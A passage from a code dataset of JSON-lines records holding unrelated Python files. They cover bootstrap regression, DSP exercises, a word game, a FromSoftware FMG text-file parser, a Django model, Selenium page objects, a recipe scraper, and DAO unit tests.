n.intercept_\r\n sample_intercept.append(inter)\r\n sample_beta.append(c)\r\n data = []\r\n #result = {'Intercept': [sample_intercept], 'Beta': [sample_beta]}\r\n int_result = pd.DataFrame(sample_intercept)\r\n results= pd.DataFrame(int_result)\r\n beta_result = np.array(sample_beta).reshape(-1,1)\r\n beta_formatted = pd.DataFrame(beta_result)\r\n results['Beta'] = pd.DataFrame(beta_formatted)\r\n return(results)\r\n \r\n\r\n\r\nX = pd.DataFrame(df['RM'])\r\ny = pd.DataFrame(df['MDEV'])\r\ntest2 = bt_beta(df, 50)\r\nintercepts = test2.iloc[:,0]\r\nbetas = test2['Beta']\r\nintercept_result = np.mean(intercepts)\r\nbeta_result = np.mean(betas)\r\nprint(\"Intercept Estimate: \", intercept_result )\r\nprint(\"Beta Estimate\", beta_result)\r\n\r\ndef bt_beta_SE(df, B):\r\n data = np.zeros((B,2))\r\n sample_betaSE = []\r\n sample_intSE = []\r\n for i in range(B):\r\n for j in range(10):\r\n x = np.random.choice(50, 1)\r\n n = 
df.iloc[x,:]\r\n data[i] = n\r\n names = ['Intercept', 'Beta']\r\n frame = pd.DataFrame(data = data, columns = names)\r\n flo = frame.astype(float)\r\n X = np.array(flo['Intercept']).reshape(-1,1)\r\n y = np.array(flo['Beta']).reshape(-1,1)\r\n int_se = np.std(X)\r\n beta_se = np.std(y)\r\n sample_betaSE.append(beta_se)\r\n sample_intSE.append(int_se)\r\n int_result = np.array(sample_intSE)\r\n int_formatted = pd.DataFrame(int_result)\r\n results= pd.DataFrame(int_formatted)\r\n beta_result = np.array(sample_betaSE)\r\n beta_formatted = pd.DataFrame(beta_result)\r\n results['Beta'] = pd.DataFrame(beta_formatted)\r\n return(results)\r\n\r\n#k = test2.iloc[2, :]\r\n#k_std = np.std(k)\r\n\r\ntest3 = bt_beta_SE(test2, 50)\r\nintercept_se = test3.iloc[:,0]\r\nbeta_se = test3['Beta']\r\nintercept_se_avg = np.mean(intercept_se)\r\nbeta_se_avg = np.mean(beta_se)\r\nprint(\"Intercept SE Estimate: \", intercept_se_avg)\r\nprint(\"Beta SE Estimate\", beta_se_avg)\r\n\r\nimport statsmodels.api as sm\r\nlr = pd.DataFrame()\r\nlr['x'] = df['RM']\r\nlr['y'] = df['MDEV']\r\n\r\nlm = sm.OLS.from_formula('y~x', lr)\r\nresult = lm.fit()\r\nprint(result.summary())\r\n\r\n#confidence interval\r\n\r\nlower_bound = beta_result - 2*beta_se_avg\r\nupper_bound = beta_result + 2*beta_se_avg\r\n\r\n\r\nCI = np.array([lower_bound,upper_bound])\r\nprint(\"Confidence Interval:\", CI)","repo_name":"julesguasp/Python_Portfolio","sub_path":"Python_Assignments/Assignment2/hw2_1.py","file_name":"hw2_1.py","file_ext":"py","file_size_in_byte":5754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70851931629","text":"'''\r\nDate: 2021.12.07\r\nTitle: z- transform study\r\nBy: Kang Jin Seong\r\n'''\r\n\r\nimport numpy as np\r\nfrom scipy import signal\r\n\r\ndef convole_m(x,nx,h,nh):\r\n nyb = min(nx) + min(nh)\r\n nye = max(nx) + max(nh)\r\n ny = np.arange(nyb,nye+1)\r\n y = np.convolve(x,h)\r\n return y, ny\r\n\r\ndef impseq(n0,n1,n2):\r\n N = n2-n1+1\r\n x = np.zeros(N)\r\n n = np.arange(N)\r\n for i in range(N):\r\n if i==n0: x[i] = 1\r\n return x,n\r\n\r\ndef stepseq(n0,n1,n2):\r\n N = n2-n1+1\r\n x = np.zeros(N)\r\n n = np.arange(N)\r\n for i in range(N):\r\n if i-n0>=0: x[i] = 1\r\n return x,n\r\n\r\n \r\n\r\n\r\ndef main():\r\n # x1 = [1,2,3]; n1 = np.arange(-1,2)\r\n # print('x1(n) = ',x1,'n1 = ',n1)\r\n # x2 = [2,4,3,5]; n2 = np.arange(-2,2)\r\n # print('x2(n) = ',x2,'n2 = ',n2)\r\n # x3,n3 = convole_m(x1,n1,x2,n2)\r\n # print('x3(n) = ',x3,'n3 = ',n3)\r\n\r\n b = [0,0,0,0.25,-0.5,0.0625]\r\n a = [1,-1,0.75,-0.25,0.0625]\r\n\r\n N = 8\r\n\r\n delta,n = impseq(0,0,7); print('impulse=',delta)\r\n x = signal.lfilter(b,a,delta); print('x(n) = ', x)\r\n n = np.arange(N)\r\n\r\n s,n1 = stepseq(2,0,7); print('step u(n-2) =', s);\r\n x = (n1-2)*np.power(0.5,n1-2)*np.cos(np.pi/3*(n1-2))*s\r\n print('x(n) =',x)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"KangJinSeong/DSP-STUDY","sub_path":"chap05_ex05.py","file_name":"chap05_ex05.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22302427665","text":"import random\nwords = ['rainbow', 'computer', 'science', 'programming', 'mathematics', 'player', 'condition', 'reverse', \n 'water', 'board', 'geeks'] \nword = random.choice(words)\nshuffled = list(word)\nrandom.shuffle(shuffled)\nshuffled = ' '.join(shuffled)\nprint(shuffled) \nanswer = input('Your answer: ')\nif answer == word:\n 
print('hurray')\nelse:\n print('oops')\n\n\n\n","repo_name":"nerissavu/D4E-TC-NGA","sub_path":"Session3/homework/serious_exercises_3.2.py","file_name":"serious_exercises_3.2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9120935400","text":"from __future__ import annotations\n\n__all__ = [\"FMG\", \"BaseFMG\", \"FMG0\", \"FMG1\", \"FMG2\"]\n\nimport abc\nimport logging\nfrom textwrap import wrap\n\nfrom soulstruct.base.game_file import GameFile\nfrom soulstruct.utilities.binary import BinaryStruct, BinaryReader\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef FMG(fmg_source, dcx_type=None, remove_empty_entries=True) -> BaseFMG:\n if fmg_source is None:\n raise ValueError(f\"Cannot auto-detect FMG class from source `None`.\")\n if isinstance(fmg_source, dict):\n try:\n version = fmg_source[\"version\"]\n except KeyError:\n raise ValueError(f\"No `version` key in FMG dictionary to read.\")\n elif isinstance(fmg_source, GameFile.Types):\n version = BinaryReader(fmg_source).unpack_value(\"b\", offset=6, relative_offset=True)\n else:\n raise ValueError(f\"Cannot auto-detect FMG class from source type {type(fmg_source)}.\")\n\n if version == 0:\n return FMG0(fmg_source, dcx_type=dcx_type, remove_empty_entries=remove_empty_entries)\n elif version == 1:\n return FMG1(fmg_source, dcx_type=dcx_type, remove_empty_entries=remove_empty_entries)\n elif version == 2:\n return FMG2(fmg_source, dcx_type=dcx_type, remove_empty_entries=remove_empty_entries)\n else:\n raise ValueError(f\"Unrecognized FMG version: {version}\")\n\n\nclass BaseFMG(GameFile, abc.ABC):\n \"\"\"Simple text dictionary.\n\n Since Demon's Souls, only the `version` field differs between games, with slight header structure changes.\n \"\"\"\n\n EXT = \".fmg\"\n HEADER_STRUCT: BinaryStruct = None\n RANGE_STRUCT: BinaryStruct = None\n STRING_OFFSET_STRUCT: BinaryStruct = None\n BIG_ENDIAN = False\n VERSION = None # type: int\n\n MAX_LINES = None # type: int\n\n entries: dict[int, str]\n\n def __init__(self, fmg_source, dcx_type=None, remove_empty_entries=True):\n self.entries = {}\n if isinstance(fmg_source, dict) and \"version\" not in fmg_source:\n fmg_source[\"version\"] = self.VERSION\n super().__init__(fmg_source, dcx_type)\n if remove_empty_entries:\n self.entries = {i: entry for i, entry in self.entries.items() if entry}\n\n def load_dict(self, data: dict, clear_old_data=True):\n if data[\"version\"] != self.VERSION:\n raise ValueError(f\"FMG dictionary has version {data['version']}, but requires version {self.VERSION}.\")\n if clear_old_data:\n self.entries = data[\"entries\"]\n else:\n self.entries.update(data[\"entries\"])\n\n def unpack(self, reader: BinaryReader, remove_empty_entries=True):\n header = reader.unpack_struct(self.HEADER_STRUCT)\n\n # Groups of contiguous text string IDs are defined by ranges (first ID, last ID) to save space.\n ranges = reader.unpack_structs(self.RANGE_STRUCT, count=header[\"range_count\"])\n if reader.position != header[\"string_offsets_offset\"]:\n _LOGGER.warning(\"Range data did not end at string data offset given in FMG header.\")\n string_offsets = reader.unpack_structs(self.STRING_OFFSET_STRUCT, count=header[\"string_count\"])\n\n # Text pointer table corresponds to all the IDs (joined together) of the above ranges, in order.\n for string_range in ranges:\n i = string_range[\"first_index\"]\n for string_id in range(string_range[\"first_id\"], string_range[\"last_id\"] + 1):\n if 
string_id in self.entries:\n raise ValueError(f\"Malformed FMG: Entry index {string_id} appeared more than once.\")\n string_offset = string_offsets[i][\"offset\"]\n if string_offset == 0:\n if not remove_empty_entries:\n # Empty text string. These will trigger in-game error messages, like ?PlaceName?.\n # Distinct from ' ', which is intentionally blank text data (e.g. the unused area subtitles).\n self.entries[string_id] = \"\"\n else:\n string = reader.unpack_string(offset=string_offset, encoding=\"utf-16le\")\n if string or not remove_empty_entries:\n self.entries[string_id] = string\n i += 1\n\n def to_dict(self):\n return {\n \"dcx_type\": self.dcx_type.value,\n \"version\": self.VERSION,\n \"entries\": self.entries.copy(),\n }\n\n def pack(self, remove_empty_entries=True, pipe_to_newline=True, word_wrap_limit=None, max_lines=None):\n \"\"\"Pack text dictionary to binary FMG file.\n\n Args:\n remove_empty_entries: Ignore empty entries ('') when writing. This will remove many entries from the vanilla\n FMG files, and likely make some of them larger (as the ranges used to define them will be more broken\n up), but will make the dictionary much easier to read through. (Default: True)\n pipe_to_newline: Convert pipes ('|') to newlines ('\\n'), which allows for nicer strings. Newline characters\n will still be treated normally. (Default: True)\n word_wrap_limit: Specify a horizontal character limit for automatic word wrapping. If None, no wrapping will\n be applied. (Default: None)\n max_lines: Maximum number of lines that should appear in each text entry. An error will be raised if any\n text exceeds this (and no file will be written). This is most useful for item descriptions when auto\n wrapping is used. It defaults to a class value, `.MAX_LINES`.\n\n Note that none of these arguments will modify the entries in this FMG instance, only the packed output.\n \"\"\"\n if max_lines is None:\n max_lines = self.MAX_LINES\n\n # Convert to sorted list (sorted by ID).\n if remove_empty_entries:\n fmg_entries = sorted([(k, v) for k, v in self.entries.items() if v != \"\"], key=lambda x: x[0])\n else:\n fmg_entries = sorted([(k, v) for k, v in self.entries.items()], key=lambda x: x[0])\n\n for i in range(len(fmg_entries)):\n # Optional: convert double spaces to double new lines.\n index, string = fmg_entries[i]\n if pipe_to_newline:\n string = string.replace(\"|\", \"\\n\")\n fmg_entries[i] = (index, string)\n # Optional: insert new lines to wrap automatically.\n if word_wrap_limit is not None:\n lines = string.split(\"\\n\\n\")\n if lines != [\" \"]:\n # Wrap lines, and re-add manual newlines.\n wrapped_lines = []\n for line in lines:\n if \"\\n\" in line:\n # Don't touch lines with newlines already in them.\n wrapped_lines.append(line)\n else:\n wrapped_lines.append(\"\\n\".join(wrap(line, word_wrap_limit)))\n wrapped_string = \"\\n\\n\".join(wrapped_lines).rstrip(\"\\n\")\n line_count = wrapped_string.count(\"\\n\") + 1\n if max_lines is not None and line_count > max_lines - 1:\n _LOGGER.warning(\n f\"FMG index {index} has {line_count} lines (max is {max_lines}):\\n\" f\"{wrapped_string}\"\n )\n fmg_entries[i] = (index, wrapped_string)\n\n # Encode all text entries and pack them, and record the offsets (will be globally offset later).\n relative_string_offset = 0\n packed_strings = b\"\"\n string_offset_list = []\n\n for string_id, string in fmg_entries:\n if string == \"\":\n string_offset_list.append(-1) # changed to zero when offsets become absolute\n null_terminated_text = 
string.encode(\"utf-16le\") + b\"\\0\\0\"\n packed_strings += null_terminated_text\n string_offset_list.append(relative_string_offset)\n relative_string_offset += len(null_terminated_text)\n\n # Next, the ranges. We just make these as efficient as possible, but unlike FROM, we value the lack of clutter\n # from empty entries more highly than defining a handful less ranges.\n ranges = []\n range_start_index = None\n range_start = None\n range_stop = None\n for string_index, (string_id, _) in enumerate(fmg_entries):\n if range_start_index is None:\n range_start_index = string_index\n range_start = range_stop = string_id\n elif string_id == range_stop + 1:\n # Expand current range to include this string.\n range_stop += 1\n else:\n # Terminate last range...\n ranges.append(\n self.RANGE_STRUCT.pack(first_index=range_start_index, first_id=range_start, last_id=range_stop)\n )\n # ... then start new one at this string.\n range_start_index = string_index\n range_start = range_stop = string_id\n\n if range_start is not None:\n # Terminate last range.\n ranges.append(\n self.RANGE_STRUCT.pack(first_index=range_start_index, first_id=range_start, last_id=range_stop)\n )\n\n packed_ranges = b\"\".join(ranges)\n\n # Compute table offsets.\n ranges_offset = self.HEADER_STRUCT.size\n string_offsets_offset = ranges_offset + len(packed_ranges)\n packed_strings_offset = string_offsets_offset + self.STRING_OFFSET_STRUCT.size * len(string_offset_list)\n file_size = packed_strings_offset + len(packed_strings)\n packed_string_offsets = b\"\"\n for string_offset in string_offset_list:\n if string_offset == -1:\n packed_string_offsets += self.STRING_OFFSET_STRUCT.pack(offset=0)\n else:\n packed_string_offsets += self.STRING_OFFSET_STRUCT.pack(offset=packed_strings_offset + string_offset)\n\n packed_header = self.HEADER_STRUCT.pack(\n file_size=file_size,\n range_count=len(ranges),\n string_count=len(fmg_entries),\n string_offsets_offset=string_offsets_offset,\n )\n\n return packed_header + packed_ranges + packed_string_offsets + packed_strings\n\n def write(\n self,\n file_path=None,\n make_dirs=True,\n check_hash=False,\n remove_empty_entries=True,\n pipe_to_newline=True,\n word_wrap_limit=None,\n max_lines=None,\n ):\n \"\"\"Write binary FMG to given path. See `pack` for descriptions of the other arguments.\"\"\"\n super().write(\n file_path=file_path,\n make_dirs=make_dirs,\n check_hash=check_hash,\n remove_empty_entries=remove_empty_entries,\n pipe_to_newline=pipe_to_newline,\n word_wrap_limit=word_wrap_limit,\n max_lines=max_lines,\n )\n\n def __getitem__(self, index: int):\n return self.entries[index]\n\n def __setitem__(self, index: int, text: str):\n self.entries[index] = text\n\n def update(self, entries):\n if isinstance(entries, dict):\n return self.entries.update(entries)\n elif isinstance(entries, BaseFMG):\n return self.entries.update(entries.entries)\n raise TypeError(f\"Can only call `FMG.update()` with a dictionary or another FMG, not {type(entries)}.\")\n\n def find(self, search_string, replace_with=None):\n \"\"\"Search for the given text in this FMG.\n\n Args:\n search_string: Text to find. The text can appear anywhere inside an entry to return a result.\n replace_with: String to replace the given text with in any results. 
(Default: None)\n \"\"\"\n found_something = False\n for index, text in self.entries.items():\n if search_string in text:\n if not found_something:\n print(f\"\\n~~~ FMG: {str(self.path) if self.path is not None else ''}\")\n found_something = True\n print(f\"\\n [{index}]:\\n{text}\")\n if replace_with is not None:\n self.entries[index] = text.replace(search_string, replace_with)\n print(f\" -> {self.entries[index]}\")\n if not found_something:\n print(f\"Could not find any occurrences of string {repr(search_string)}.\")\n\n def __iter__(self):\n return iter(self.entries.items())\n\n def __eq__(self, other):\n if isinstance(other, dict):\n return self.entries == other\n elif isinstance(other, BaseFMG):\n return self.entries == other.entries\n raise TypeError(\"Can only test FMG equality with a dictionary or other `BaseFMG`.\")\n\n def __repr__(self):\n s = f\"FMG Path: {str(self.path) if self.path is not None else ''}\"\n for index, text in self.entries.items():\n s += f\"\\n {index}: {text}\"\n return s\n\n\nclass FMG0(BaseFMG):\n \"\"\"Used only in Demon's Souls. Big-endian.\"\"\"\n\n HEADER_STRUCT = BinaryStruct(\n \"x\",\n (\"big_endian\", \"?\", True),\n (\"version\", \"b\", 0),\n \"x\",\n (\"file_size\", \"i\"),\n (\"one\", \"b\", 1),\n (\"unknown1\", \"b\", -1),\n \"2x\",\n (\"range_count\", \"i\"),\n (\"string_count\", \"i\"),\n (\"string_offsets_offset\", \"i\"),\n (\"zero\", \"i\", 0),\n byte_order=\">\",\n )\n RANGE_STRUCT = BinaryStruct(\n (\"first_index\", \"i\"),\n (\"first_id\", \"i\"),\n (\"last_id\", \"i\"),\n byte_order=\">\",\n )\n STRING_OFFSET_STRUCT = BinaryStruct(\n (\"offset\", \"i\"),\n byte_order=\">\",\n )\n BIG_ENDIAN = True\n VERSION = 0\n\n MAX_LINES = None # TODO: Don't know for Demon's Souls.\n\n\nclass FMG1(BaseFMG):\n \"\"\"Used in Dark Souls (both versions) and Dark Souls 2.\"\"\"\n\n HEADER_STRUCT = BinaryStruct(\n \"x\",\n (\"big_endian\", \"?\", False),\n (\"version\", \"b\", 1),\n \"x\",\n (\"file_size\", \"i\"),\n (\"one\", \"b\", 1),\n (\"unknown1\", \"b\", 0),\n \"2x\",\n (\"range_count\", \"i\"),\n (\"string_count\", \"i\"),\n (\"string_offsets_offset\", \"i\"),\n (\"zero\", \"i\", 0),\n )\n RANGE_STRUCT = BinaryStruct(\n (\"first_index\", \"i\"),\n (\"first_id\", \"i\"),\n (\"last_id\", \"i\"),\n )\n STRING_OFFSET_STRUCT = BinaryStruct(\n (\"offset\", \"i\"),\n )\n BIG_ENDIAN = False\n VERSION = 1\n\n MAX_LINES = 11 # TODO: Correct for DS1, not sure about DS2.\n\n\nclass FMG2(BaseFMG):\n \"\"\"Used in Bloodborne, Dark Souls 3, Sekiro, and Elden Ring.\"\"\"\n\n HEADER_STRUCT = BinaryStruct(\n \"x\",\n (\"big_endian\", \"?\", False),\n (\"version\", \"b\", 2),\n \"x\",\n (\"file_size\", \"i\"),\n (\"one\", \"b\", 1),\n (\"unknown1\", \"b\", 0),\n \"2x\",\n (\"range_count\", \"i\"),\n (\"string_count\", \"i\"),\n (\"unknown2\", \"i\", 255),\n (\"string_offsets_offset\", \"q\"),\n (\"zero\", \"q\", 0),\n )\n RANGE_STRUCT = BinaryStruct(\n (\"first_index\", \"i\"),\n (\"first_id\", \"i\"),\n (\"last_id\", \"i\"),\n \"4x\",\n )\n STRING_OFFSET_STRUCT = BinaryStruct(\n (\"offset\", \"q\"),\n )\n BIG_ENDIAN = False\n VERSION = 2\n\n MAX_LINES = None # TODO: Don't know for Bloodborne or DS3.\n","repo_name":"Grimrukh/soulstruct","sub_path":"soulstruct/base/text/fmg.py","file_name":"fmg.py","file_ext":"py","file_size_in_byte":15361,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"37"} +{"seq_id":"19839194671","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.conf 
import settings\nfrom django.db.models.signals import post_save\n\n\nclass Contact(models.Model):\n \"\"\"Portfolio model\"\"\"\n \n email = models.EmailField(help_text='Example: Alfredemmanuelinyang@gmail.com')\n subject = models.CharField(max_length=100, help_text='Subject of discussion')\n message = models.TextField(max_length=10000)\n \n def __str__(self):\n return 'Contact Me!'\n\n def create_user_profile(sender, instance, created, **kwargs):\n \"\"\"Creates a profile for each registered regular user\"\"\"\n\n if created and instance:\n Contact.objects.create(user=instance)\n\n post_save.connect(create_user_profile, sender=User)\n\n def save(self, *args, **kwargs):\n \"\"\"Save profile and resize profile image\"\"\"\n\n super(Contact, self).save(*args, **kwargs)","repo_name":"Pycomet-zz/portfolio-website","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"20304424786","text":"from selenium.webdriver.common.by import By\nfrom POM.Utilites.DriverActions import DriverAction\n\n\nclass HomePage:\n def __init__(self, driver):\n self.driver = driver\n self.da = DriverAction(driver)\n\n self.drop_down_xpath = \"//div[contains(text(),'48131421')]//following::div[1]\"\n self.option_css = \"#app > div.v-menu__content.theme--light.menuable__content__active>div>div:nth-child(2)>div>div\"\n self.blank_option_xpath = \"//div[contains(text(),'48131421')]//following::div[@class='v-list-item__content'][1]\"\n self.check_box_xpath = \"//div[contains(text(),'48131421')]//preceding::div[@class='v-input--selection-controls__ripple'][1]\"\n self.update_button_xpath = \"//span[contains(text(),'Update')]\"\n self.alert_ok_button_xpath = \"//span[contains(text(),'Ok')]\"\n self.sign_out_xpath = \"//span[contains(text(),'Sign Out')]\"\n\n def select_option_and_update(self):\n self.da.wait_for_element(self.drop_down_xpath).click()\n selectedOption = self.da.wait_for_element(self.option_css, by=By.CSS_SELECTOR)\n selectedText = selectedOption.text\n selectedOption.click()\n self.da.wait_for_element(self.check_box_xpath).click()\n self.da.wait_for_element(self.update_button_xpath).click()\n self.da.wait_for_element(self.alert_ok_button_xpath).click()\n\n self.driver.refresh()\n return selectedText\n\n def select_blank_option_and_update(self):\n self.da.wait_for_element(self.drop_down_xpath).click()\n selectedOption = self.da.wait_for_element(self.blank_option_xpath)\n selectedText = selectedOption.text\n selectedOption.click()\n self.da.wait_for_element(self.check_box_xpath).click()\n self.da.wait_for_element(self.update_button_xpath).click()\n self.da.wait_for_element(self.alert_ok_button_xpath).click()\n self.driver.refresh()\n\n return selectedText\n\n def logout(self):\n self.da.wait_for_element(self.sign_out_xpath).click()\n","repo_name":"RautelaZone/old_stuff_2021","sub_path":"Interview Projects/NMG_Technology_POM/Pages/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28920516311","text":"def run():\n\n # To use reduce\n from functools import reduce\n\n # With list comprehensions\n my_list = [1, 4, 5, 6, 9, 13, 19, 21]\n odd = [i for i in my_list if i % 2 != 0]\n print(\"With list comprehensions = {}\".format(odd))\n\n # With filter function\n my_list = [1, 4, 5, 6, 9, 13, 19, 21]\n odd = list(filter(lambda i: i % 2 != 
0, my_list))\n print(\"With filter function = {}\".format(odd))\n\n print(\"-----------------------------------------------------------\")\n\n # With list comprehensions\n my_list = [1, 2, 3, 4, 5]\n squares = [i ** 2 for i in my_list]\n print(\"With list comprehensions = {}\".format(squares))\n\n # With map function\n my_list = [1, 2, 3, 4, 5]\n squares = list(map(lambda i: i ** 2, my_list))\n print(\"With map function = {}\".format(squares))\n\n print(\"-----------------------------------------------------------\")\n\n # With for loop\n my_list = [2, 2, 2, 2, 2]\n all_multiplied = 1\n\n for i in my_list:\n all_multiplied = all_multiplied * i\n\n print(\"With a for loop = {}\".format(all_multiplied))\n\n # With reduce function\n my_list = [2, 2, 2, 2, 2]\n all_multiplied = reduce(lambda a, b: a * b, my_list)\n print(\"With reduce function = {}\".format(all_multiplied))\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"SergioO21/intermediate_python","sub_path":"high_order_functions.py","file_name":"high_order_functions.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"34202699998","text":"#! /usr/bin/env python3\n\nimport argparse\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\n\n\ndef scrape(url):\n try:\n html = urlopen(url)\n except HTTPError:\n return None\n soup = BeautifulSoup(html.read())\n content = {}\n content['title'] = get_title(soup)\n content['ingredients'] = get_ingredients(soup)\n content['directions'] = get_directions(soup)\n content['servings'] = get_servings(soup)\n content['source'] = 'Bon Appetit'\n content['source_url'] = url\n content['img_url'] = get_img_url(soup)\n content['cooking_time'] = get_cooking_time(soup)\n content['total_time'] = get_total_time(soup)\n content['notes'] = get_notes(soup)\n\n return content\n\ndef get_title(soup):\n try:\n title = soup.find('h3', {'class': 'recipe-title'})\n return title.text\n except AttributeError:\n return ''\n\ndef get_img_url(soup):\n try:\n img_url = soup.find('meta', {'property': 'og:image'})\n return img_url.attrs['content']\n except AttributeError:\n return ''\n\ndef get_ingredients(soup):\n try:\n ingredients = []\n for ingredient in soup.findAll('span', {'class': 'ingredient'}):\n\n quantity = ingredient.find('span', {'class': 'quantity'}).text\n unit = ingredient.find('span', {'class': 'unit'}).text\n name = ingredient.find('span', {'class': 'name'}).text\n ingredient_str = ''\n if quantity:\n ingredient_str += quantity\n if unit:\n if quantity:\n ingredient_str += \" \"\n ingredient_str += unit\n if name:\n if quantity or unit:\n ingredient_str += \" \"\n name = name.replace('\\u2028\\t', '')\n ingredient_str += name\n ingredients.append(ingredient_str)\n return ingredients\n except AttributeError:\n return ''\n\ndef get_directions(soup):\n try:\n directions = []\n for direction in soup.findAll('div', {'itemprop': 'recipeInstructions'}):\n directions.append(direction.text)\n return directions\n except AttributeError:\n return ''\n\ndef get_servings(soup):\n try:\n servings = soup.find('span', {'class': 'total-servings'}).text\n if servings:\n return servings.split('Servings: ')[1]\n except AttributeError:\n return ''\n\ndef get_cooking_time(soup):\n try:\n cooking_time = soup.find('span', {'class': 'active-time',\n 'itemprop': ''}).text\n if cooking_time:\n return cooking_time.split('active: ')[1]\n except AttributeError:\n return ''\n\ndef 
get_total_time(soup):\n    try:\n        total_time = soup.find('span', {'class': 'active-time',\n                                        'itemprop': 'totalTime'}).text\n        if total_time:\n            return total_time.split('total: ')[1]\n    except AttributeError:\n        return ''\n\ndef get_notes(soup):\n    try:\n        notes = soup.find('div', {'class': 'content-intro'}).h2.text\n        return notes\n    except AttributeError:\n        return ''\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description='Scraper for Bon Appetit website')\n    parser.add_argument('url', action='store', help='url to scrape')\n    return parser.parse_args()\n\n\ndef print_recipe(d):\n    print(d['title'])\n    print('\\n\\nIngredients:\\n')\n    print('\\n'.join(d['ingredients']))\n    print('\\n\\nDirections:\\n')\n    print('\\n\\n'.join(d['directions']))\n    if d['servings']:\n        print('\\n\\nServings: ', d['servings'])\n    if d['source']:\n        print('\\nSource: ', d['source'])\n    if d['source_url']:\n        print('\\nSource URL: ', d['source_url'])\n    if d['img_url']:\n        print('\\nImage URL: ', d['img_url'])\n    if d['cooking_time']:\n        print('\\nCooking Time: ', d['cooking_time'])\n    if d['total_time']:\n        print('\\nTotal Time: ', d['total_time'])\n    if d['notes']:\n        print('\\nNotes:\\n')\n        print(d['notes'])\n\n\nif __name__ == '__main__':\n    args = parse_args()\n    print_recipe(scrape(args.url))\n","repo_name":"benosment/bas","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40098811466","text":"\nimport pytest\nfrom datetime import datetime, timezone\nfrom unittest.mock import MagicMock, patch\n\nfrom model import ConnectionAction, ConnectionItem\nfrom dao import ConnectionDao, ConnectionNotFoundException\n\npath = 'dao.connection_dao'\n\n\nclass TestConnectionDao:\n\n  @pytest.fixture(autouse=True)\n  def datetime_mock(self):\n    with patch(f'{path}.datetime') as mock:\n      mock.now.return_value = datetime(2022, 1, 1, tzinfo=timezone.utc)\n      yield mock\n  \n  @pytest.fixture\n  def transaction(self):\n    return MagicMock()\n\n  @pytest.fixture\n  def obj(self):\n    dao = ConnectionDao()\n    with patch.object(dao, 'client'):\n      yield dao\n\n  def test_init(self, obj):\n    assert isinstance(obj, ConnectionDao)\n\n  def test_create(self, obj):\n    obj.create(ConnectionItem(id='test', modified_action=ConnectionAction.CREATE_CONNECTION))\n    obj.client.put_item.assert_called_once_with(**{\n      'TableName': 'DeathDiceStage',\n      'Item': {\n        'id': {'S': 'test'},\n        'nickname': {'NULL': True},\n        'account_id': {'NULL': True},\n        'game_id': {'NULL': True},\n        'modified_action': {'S': 'CREATE_CONNECTION'},\n        'version': {'N': '0'},\n        'modified_at': {'S': '2022-01-01 00:00:00.000000'},\n        'table': {'S': 'Connection'},\n      },\n      'ConditionExpression': 'attribute_not_exists(id)',\n    })\n  \n  def test_get(self, obj, datetime_mock):\n    obj.client.get_item.return_value = {\n      'Item': ConnectionItem.serialise(\n        ConnectionItem(\n          id='test',\n          modified_at=datetime_mock.now(),\n          modified_action=ConnectionAction.SET_NICKNAME,\n        )\n      )\n    }\n    item = obj.get('test')\n    assert isinstance(item, ConnectionItem)\n    assert item.id == 'test'\n    obj.client.get_item.assert_called_once_with(**{\n      'TableName': 'DeathDiceStage',\n      'Key': {'id': {'S': 'test'}},\n    })\n  \n  def test_get_not_found(self, obj, datetime_mock):\n    obj.client.get_item.return_value = {}\n    with pytest.raises(ConnectionNotFoundException):\n      obj.get('id')\n\n  def test_set(self, obj, transaction, datetime_mock):\n    obj.set(\n      ConnectionItem(\n        id='id',\n        modified_action=ConnectionAction.SET_NICKNAME,\n        
account_id='account_id',\n        game_id='game_id',\n        version=2,\n        modified_at=datetime_mock.now()\n      ),\n      transaction,\n    )\n\n    transaction.write.assert_called_once_with({\n      'Put': {\n        'TableName': 'DeathDiceStage',\n        'Item': {\n          'id': {'S': 'id'},\n          'nickname': {'NULL': True},\n          'account_id': {'S': 'account_id'},\n          'game_id': {'S': 'game_id'},\n          'modified_action': {'S': 'SET_NICKNAME'},\n          'version': {'N': '3'},\n          'modified_at': {'S': '2022-01-01 00:00:00.000000'},\n          'table': {'S': 'Connection'},\n        },\n        'ConditionExpression': 'attribute_exists(id) AND version = :v',\n        'ExpressionAttributeValues': {':v': {'N': '2'}},\n      }\n    })\n\n  def test_delete(self, obj, transaction):\n    obj.delete(ConnectionItem(id=\"id\", game_id=\"game_id\", version=2, modified_action=ConnectionAction.SET_NICKNAME), transaction)\n    transaction.write.assert_called_once_with({\n      'Delete': {\n        'TableName': 'DeathDiceStage',\n        'Key': {'id': {'S': 'id'}},\n        'ConditionExpression': 'attribute_exists(id) AND version = :v',\n        'ExpressionAttributeValues': {\n          ':v': {'N': '2'}\n        }\n      }\n    })\n\n  @pytest.mark.parametrize('name, expected', [\n    pytest.param('Roib', True, id='normal'),\n    pytest.param('', False, id='too short'),\n    pytest.param('1234567891011121314151617', False, id='too long'),\n    pytest.param('Mr Eleven', False, id='protected word'),\n    pytest.param('Mr Eleven ', False, id='protected word with space'),\n  ])\n  def test_is_valid_nickname(self, obj, name, expected):\n    assert obj.is_valid_nickname(name) == 